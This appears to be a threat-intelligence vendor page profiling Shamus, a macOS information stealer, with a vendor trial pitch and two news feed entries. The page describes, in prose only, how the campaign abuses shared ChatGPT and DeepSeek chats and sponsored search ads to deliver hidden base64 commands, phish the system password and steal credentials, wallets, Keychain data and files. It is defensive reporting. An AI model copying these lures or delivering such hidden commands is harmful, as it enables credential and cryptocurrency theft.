Malware

Shamus

Shamus is a macOS information stealer and cryptocurrency thief. In the referenced campaign, threat actors abused legitimate AI platforms including ChatGPT and DeepSeek by using sponsored Google search results to redirect users seeking macOS troubleshooting advice to fake shared chat links. Those chats contained hidden base64-encoded commands that initiated infection. The chain began with a bash script that prompted the user for their system password; the captured password was then used to escalate privileges and download the main malware binary. Breakpoint Security identified the sample as Shamus. The malware uses arithmetic and XOR encoding with a custom 6-bit decoder to obfuscate its code, hindering static analysis and detection. It establishes persistence via a LaunchDaemon configured to run at startup. Shamus steals browser cookies and passwords from Chrome, Firefox, and 12 other Chromium-based browsers; targets 15 desktop and hardware cryptocurrency wallet applications including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core; and steals the entire macOS Keychain database, Telegram session data, VPN profiles, and files from the Desktop and Documents folders. Stolen data is compressed and exfiltrated to attacker-controlled command-and-control servers over encrypted communications.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app

the hacker newsNews

Dec 11, 2025

ThreatsDay Bulletin: Spyware Alerts, Mirai Strikes, Docker Leaks, ValleyRAT Rootkit - and 20 More Stories

Stealer malware referenced as being distributed via poisoned shared AI-chat troubleshooting/installation guides promoted through SEO poisoning and sponsored search results.

cyber security newsNews

Dec 11, 2025

Hackers Leveraging LLM Shared Chats to Steal Your Passwords and Crypto

Shamus is a sophisticated multi-stage information stealer and cryptocurrency thief targeting macOS systems. It uses multi-layered encoding and obfuscation to evade detection, steals browser credentials, cryptocurrency wallet data, macOS Keychain, Telegram sessions, VPN profiles, and files, and maintains persistence via LaunchDaemon.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.